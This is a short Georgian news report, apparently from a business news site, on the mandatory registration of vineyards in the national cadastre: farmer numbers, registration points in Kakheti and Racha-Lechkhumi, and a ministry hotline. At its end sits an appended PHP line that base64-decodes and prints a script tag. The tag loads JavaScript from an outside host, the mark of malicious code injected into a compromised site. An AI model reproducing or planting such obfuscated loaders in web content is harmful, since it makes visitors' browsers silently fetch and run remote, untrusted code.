celsiusi
ავერსი საქკაბელი
2019 წლიდან დღემდე, ვენახების საკადასტრო ამონაწერი გაცემულია 21 ათას ფერმერზე, აქედან 6 ათასი, მიმდინარე წელს.
 
როგორც "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს, 2021 წლიდან, რთველის დროს, ვენახების საკადასტრო ამონაწერის გარეშე, მევენახე ღვინის საწარმოს ყურძენს ვერ ჩააბარებს. ვენახების რეგისტრაცია და კადასტრის ამონაწერით მოსავლის ჩაბარება ყველა მევენახისთვის სავალდებულო გახდა. 
ფერმერებს ვენახების რეგისტრაცია და ვენახის საკადასტრო ინფორმაციის განახლება ამ ეტაპზე ყვარელში, გურჯაანში, სიღნაღში, თელავში, ახმეტაში და  აღნიშნული მუნიციპალიტეტების სოფლებში განთავსებულ, ჯამში, 47 სარეგისტრაციო უბანში შეუძლიათ.
 
რაჭა-ლეჩხუმის რეგიონში, ასევე, დედოფლისწყაროს, ლაგოდეხისა და საგარეჯოს მუნიციპალიტეტებში რეგისტრაცია უახლოეს დღეებში დაიწყება. 
 
რაჭა-ლეჩხუმის რეგიონში, ღვინის ეროვნული სააგენტოს სპეციალისტების მიერ უკვე მომზადებულია  10 პირი, რომლებიც მევენახეებს კადასტრის ერთიან ბაზაში დაარეგისტრირებენ.
 
ვენახების კადასტრის პროგრამასთან დაკავშირებული დამატებითი ინფორმაციის მისაღებად, დაინტერესებულ პირებს შეუძლიათ  გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ცხელი ხაზს - 1501 დაუკავშირდნენ.
 
 
1376
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");